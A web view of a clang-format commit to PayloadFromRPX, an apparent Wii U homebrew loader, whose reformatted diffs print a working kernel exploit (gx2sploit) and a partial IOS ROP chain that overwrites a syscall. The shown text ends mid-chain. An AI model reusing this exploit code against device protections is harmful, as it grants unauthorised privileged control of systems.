The-Homebrew-Cloud
/
PayloadFromRPX
mirror of https://github.com/wiiu-env/PayloadFromRPX.git
2
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Format via clang-format

This commit is contained in:
Maschell 2022-03-05 17:00:58 +01:00
parent f74dd732b0
commit de4405ecf9
20 changed files with 502 additions and 404 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
.clang-format Normal file
View File

@ -0,0 +1,67 @@
# Generated from CLion C/C++ Code Style settings
BasedOnStyle: LLVM
AccessModifierOffset: -4
AlignAfterOpenBracket: Align
AlignConsecutiveAssignments: Consecutive
AlignConsecutiveMacros: AcrossEmptyLinesAndComments
AlignOperands: Align
AllowAllArgumentsOnNextLine: false
AllowAllConstructorInitializersOnNextLine: false
AllowAllParametersOfDeclarationOnNextLine: false
AllowShortBlocksOnASingleLine: Always
AllowShortCaseLabelsOnASingleLine: false
AllowShortFunctionsOnASingleLine: All
AllowShortIfStatementsOnASingleLine: Always
AllowShortLambdasOnASingleLine: All
AllowShortLoopsOnASingleLine: true
AlwaysBreakAfterReturnType: None
AlwaysBreakTemplateDeclarations: Yes
BreakBeforeBraces: Custom
BraceWrapping:
AfterCaseLabel: false
AfterClass: false
AfterControlStatement: Never
AfterEnum: false
AfterFunction: false
AfterNamespace: false
AfterUnion: false
BeforeCatch: false
BeforeElse: false
IndentBraces: false
SplitEmptyFunction: false
SplitEmptyRecord: true
BreakBeforeBinaryOperators: None
BreakBeforeTernaryOperators: true
BreakConstructorInitializers: BeforeColon
BreakInheritanceList: BeforeColon
ColumnLimit: 0
CompactNamespaces: false
ContinuationIndentWidth: 8
IndentCaseLabels: true
IndentPPDirectives: None
IndentWidth: 4
KeepEmptyLinesAtTheStartOfBlocks: true
MaxEmptyLinesToKeep: 2
NamespaceIndentation: All
ObjCSpaceAfterProperty: false
ObjCSpaceBeforeProtocolList: true
PointerAlignment: Right
ReflowComments: false
SpaceAfterCStyleCast: true
SpaceAfterLogicalNot: false
SpaceAfterTemplateKeyword: false
SpaceBeforeAssignmentOperators: true
SpaceBeforeCpp11BracedList: false
SpaceBeforeCtorInitializerColon: true
SpaceBeforeInheritanceColon: true
SpaceBeforeParens: ControlStatements
SpaceBeforeRangeBasedForLoopColon: true
SpaceInEmptyParentheses: false
SpacesBeforeTrailingComments: 1
SpacesInAngles: false
SpacesInCStyleCastParentheses: false
SpacesInContainerLiterals: false
SpacesInParentheses: false
SpacesInSquareBrackets: false
TabWidth: 4
UseTab: Never

10
.github/workflows/ci.yml vendored
View File

@ -6,8 +6,16 @@ on:
- master
jobs:
clang-format:
runs-on: ubuntu-18.04
steps:
- uses: actions/checkout@v2
- name: clang-format
run: |
docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source
build-binary:
runs-on: ubuntu-18.04
needs: clang-format
steps:
- uses: actions/checkout@v2
- name: build binary
@ -26,7 +34,7 @@ jobs:
id: get_repository_name
run: |
echo REPOSITORY_NAME=$(echo "$GITHUB_REPOSITORY" | awk -F / '{print $2}' | sed -e "s/:refs//") >> $GITHUB_ENV
echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV
echo DATETIME=$(echo $(date '+%Y%m%d-%H%M%S')) >> $GITHUB_ENV
- uses: actions/download-artifact@master
with:
name: binary

8
.github/workflows/pr.yml vendored
View File

@ -3,8 +3,16 @@ name: CI-PR
on: [pull_request]
jobs:
clang-format:
runs-on: ubuntu-18.04
steps:
- uses: actions/checkout@v2
- name: clang-format
run: |
docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source
build-binary:
runs-on: ubuntu-18.04
needs: clang-format
steps:
- uses: actions/checkout@v2
- name: build binary

5
README.md
View File

@ -63,6 +63,11 @@ docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make
docker run -it --rm -v ${PWD}:/project payloadfromrpx-builder make clean
```
## Format the code via docker
`docker run --rm -v ${PWD}:/src wiiuenv/clang-format:13.0.0-2 -r ./source -i`
## Credits
- orboditilt
- Maschell

35
source/ElfUtils.c
View File

@ -1,19 +1,19 @@
#include <stdio.h>
#include <string.h>
#include <coreinit/debug.h>
#include <coreinit/cache.h>
#include <coreinit/debug.h>
#include <coreinit/memdefaultheap.h>
#include <whb/sdcard.h>
#include <utils/logger.h>
#include <whb/file.h>
#include <whb/log.h>
#include <utils/logger.h>
#include <whb/sdcard.h>
#include "elf_abi.h"
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) {
char path[256];
int result = 0;
int result = 0;
char *sdRootPath = "";
if (!WHBMountSdCard()) {
DEBUG_FUNCTION_LINE("Failed to mount SD Card...");
@ -33,7 +33,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si
goto exit;
}
exit:
exit:
WHBUnmountSdCard();
return result;
}
@ -41,7 +41,7 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si
static void InstallMain(void *data_elf);
uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) {
char *elf_data = NULL;
char *elf_data = NULL;
uint32_t fileSize = 0;
if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) {
return 0;
@ -61,10 +61,7 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ
static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) {
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data;
if (!data
|| !IS_ELF (*ehdr)
|| (ehdr->e_type != ET_EXEC)
|| (ehdr->e_machine != EM_PPC)) {
if (!data || !IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_PPC)) {
OSFatal("Invalid elf file");
}
@ -96,9 +93,9 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned
static void InstallMain(void *data_elf) {
// get .text section
unsigned int main_text_addr = 0;
unsigned int main_text_len = 0;
unsigned int main_text_len = 0;
unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1);
unsigned char *main_text = data_elf + section_offset;
unsigned char *main_text = data_elf + section_offset;
/* Copy main .text to memory */
if (section_offset > 0) {
DEBUG_FUNCTION_LINE("Copy section to %08X from %08X (size: %d)", main_text_addr, main_text, main_text_len);
@ -110,21 +107,20 @@ static void InstallMain(void *data_elf) {
// get the .rodata section
unsigned int main_rodata_addr = 0;
unsigned int main_rodata_len = 0;
section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0);
unsigned int main_rodata_len = 0;
section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0);
if (section_offset > 0) {
unsigned char *main_rodata = data_elf + section_offset;
/* Copy main rodata to memory */
memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len);
DCFlushRange((void *) main_rodata_addr, main_rodata_len);
ICInvalidateRange((void *) main_rodata_addr, main_rodata_len);
}
// get the .data section
unsigned int main_data_addr = 0;
unsigned int main_data_len = 0;
section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0);
unsigned int main_data_len = 0;
section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0);
if (section_offset > 0) {
unsigned char *main_data = data_elf + section_offset;
/* Copy main data to memory */
@ -135,8 +131,8 @@ static void InstallMain(void *data_elf) {
// get the .bss section
unsigned int main_bss_addr = 0;
unsigned int main_bss_len = 0;
section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0);
unsigned int main_bss_len = 0;
section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0);
if (section_offset > 0) {
unsigned char *main_bss = data_elf + section_offset;
/* Copy main data to memory */
@ -144,5 +140,4 @@ static void InstallMain(void *data_elf) {
DCFlushRange((void *) main_bss_addr, main_bss_len);
ICInvalidateRange((void *) main_bss_addr, main_bss_len);
}
}

1
source/elf_abi.h
View File

@ -1,3 +1,4 @@
// clang-format off
/*
* Copyright (c) 1995, 1996, 2001, 2002
* Erik Theisen. All rights reserved.

146
source/gx2sploit.cpp
View File

@ -1,34 +1,33 @@
#include <coreinit/core.h>
#include <coreinit/memory.h>
#include <coreinit/debug.h>
#include <coreinit/thread.h>
#include <coreinit/cache.h>
#include <coreinit/dynload.h>
#include <coreinit/thread.h>
#include <coreinit/exit.h>
#include <sysapp/launch.h>
#include <gx2/state.h>
#include <coreinit/memorymap.h>
#include <whb/log.h>
#include <malloc.h>
#include <cstring>
#include <utils/logger.h>
#include "ElfUtils.h"
#include "gx2sploit.h"
#include "ElfUtils.h"
#include <coreinit/cache.h>
#include <coreinit/core.h>
#include <coreinit/debug.h>
#include <coreinit/dynload.h>
#include <coreinit/exit.h>
#include <coreinit/memory.h>
#include <coreinit/memorymap.h>
#include <coreinit/thread.h>
#include <cstring>
#include <gx2/state.h>
#include <malloc.h>
#include <sysapp/launch.h>
#include <utils/logger.h>
#include <whb/log.h>
#define JIT_ADDRESS 0x01800000
#define JIT_ADDRESS 0x01800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len);
@ -49,24 +48,23 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
/* Chadderz's kernel write function */
void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) {
asm volatile (
"li 3,1\n"
"li 4,0\n"
"mr 5,%1\n"
"li 6,0\n"
"li 7,0\n"
"lis 8,1\n"
"mr 9,%0\n"
"mr %1,1\n"
"li 0,0x3500\n"
"sc\n"
"nop\n"
"mr 1,%1\n"
:
: "r"(addr), "r"(value)
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
"11", "12"
);
asm volatile(
"li 3,1\n"
"li 4,0\n"
"mr 5,%1\n"
"li 6,0\n"
"li 7,0\n"
"lis 8,1\n"
"mr 9,%0\n"
"mr %1,1\n"
"li 0,0x3500\n"
"sc\n"
"nop\n"
"mr 1,%1\n"
:
: "r"(addr), "r"(value)
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
"11", "12");
}
extern "C" void OSSwitchSecCodeGenMode(int);
@ -75,7 +73,7 @@ int exploitThread(int argc, char **argv) {
OSDynLoad_Module gx2_handle;
OSDynLoad_Acquire("gx2.rpl", &gx2_handle);
void (*pGX2SetSemaphore)(uint64_t *sem, int action);
void (*pGX2SetSemaphore)(uint64_t * sem, int action);
OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore);
uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C;
@ -98,16 +96,16 @@ int exploitThread(int argc, char **argv) {
/* Set the kernel heap metadata entry */
uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
metadata[0] = (uint32_t) drvhax;
metadata[1] = (uint32_t) -0x4c;
metadata[2] = (uint32_t) -1;
metadata[3] = (uint32_t) -1;
metadata[0] = (uint32_t) drvhax;
metadata[1] = (uint32_t) -0x4c;
metadata[2] = (uint32_t) -1;
metadata[3] = (uint32_t) -1;
/* Find stuff */
uint32_t gx2data[] = {0xfc2a0000};
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14);
uint32_t gx2data[] = {0xfc2a0000};
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t))(((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14);
/* Modify a next ptr on the heap */
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
@ -186,15 +184,23 @@ static void SCSetupIBAT4DBAT5() {
// 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor)
unsigned int ibat4u = 0x008000FF;
unsigned int ibat4l = 0x30800012;
asm volatile("mtspr 560, %0" : : "r" (ibat4u));
asm volatile("mtspr 561, %0" : : "r" (ibat4l));
asm volatile("mtspr 560, %0"
:
: "r"(ibat4u));
asm volatile("mtspr 561, %0"
:
: "r"(ibat4l));
// Give our and the kernel full data access rights.
// 00800000-01000000 => 30800000-31000000 (read/write, user/supervisor)
unsigned int dbat5u = ibat4u;
unsigned int dbat5l = ibat4l;
asm volatile("mtspr 570, %0" : : "r" (dbat5u));
asm volatile("mtspr 571, %0" : : "r" (dbat5l));
asm volatile("mtspr 570, %0"
:
: "r"(dbat5u));
asm volatile("mtspr 571, %0"
:
: "r"(dbat5l));
asm volatile("eieio; isync");
}
@ -205,13 +211,13 @@ int DoKernelExploit(void) {
DEBUG_FUNCTION_LINE("Running GX2Sploit");
/* Make a thread to modify the semaphore */
OSThread *thread = (OSThread *) memalign(8, 0x1000);
uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000);
uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000);
OSSwitchSecCodeGenMode(0);
memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100);
unsigned int setIBAT0Addr = 0x1800200;
unsigned int *curAddr = (uint32_t *) setIBAT0Addr;
unsigned int *curAddr = (uint32_t *) setIBAT0Addr;
curAddr[0] = 0x7C0006AC;
curAddr[1] = 0x4C00012C;
@ -241,18 +247,18 @@ int DoKernelExploit(void) {
uint32_t targetAddress = 0x017FF000;
KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40);
targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528
targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03
targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3
targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530
targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03
targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3
targetBuffer[6] = 0x7c0006ac; // eieio
targetBuffer[7] = 0x4c00012c; // isync
targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
targetBuffer[10] = 0x7c6903a6; // mtctr r3
targetBuffer[11] = 0x4e800420; // bctr
targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528
targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03
targetBuffer[2] = 0x7c7083a6; // mtspr 528, r3
targetBuffer[3] = 0x7c7282a6; // mfspr r3, 530
targetBuffer[4] = 0x60630003; // ori r3, r3, 0x03
targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3
targetBuffer[6] = 0x7c0006ac; // eieio
targetBuffer[7] = 0x4c00012c; // isync
targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
targetBuffer[10] = 0x7c6903a6; // mtctr r3
targetBuffer[11] = 0x4e800420; // bctr
DCFlushRange(targetBuffer, sizeof(targetBuffer));
KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40);

12
source/gx2sploit.h
View File

@ -4,11 +4,13 @@
extern "C" {
#endif
#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown
#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games
#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader
#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu
#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL)
#include <stdint.h>
#define KERN_SYSCALL_TBL_1 0xFFE84C70 // unknown
#define KERN_SYSCALL_TBL_2 0xFFE85070 // works with games
#define KERN_SYSCALL_TBL_3 0xFFE85470 // works with loader
#define KERN_SYSCALL_TBL_4 0xFFEAAA60 // works with home menu
#define KERN_SYSCALL_TBL_5 0xFFEAAE60 // works with browser (previously KERN_SYSCALL_TBL)
int DoKernelExploit(void);

502
source/ios_exploit.c
View File

@ -1,15 +1,15 @@
#include <string.h>
#include <stdio.h>
#include <coreinit/cache.h>
#include <coreinit/thread.h>
#include <coreinit/ios.h>
#include "ios_exploit.h"
#include <coreinit/cache.h>
#include <coreinit/ios.h>
#include <coreinit/thread.h>
#include <stdio.h>
#include <string.h>
#define CHAIN_START 0x1016AD40
#define SOURCE (0x120000)
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC
#define CHAIN_START 0x1016AD40
#define SOURCE (0x120000)
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC
static void uhs_exploit_init(int uhs_handle);
@ -17,7 +17,7 @@ static int uhs_write32(int uhs_handle, int arm_addr, int val);
//!------Variables used in exploit------
static int *pretend_root_hub = (int *) 0xF5003ABC;
static int *ayylmao = (int *) 0xF4500000;
static int *ayylmao = (int *) 0xF4500000;
//!-------------------------------------
typedef struct __attribute__((packed)) {
@ -31,266 +31,266 @@ typedef struct __attribute__((packed)) {
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
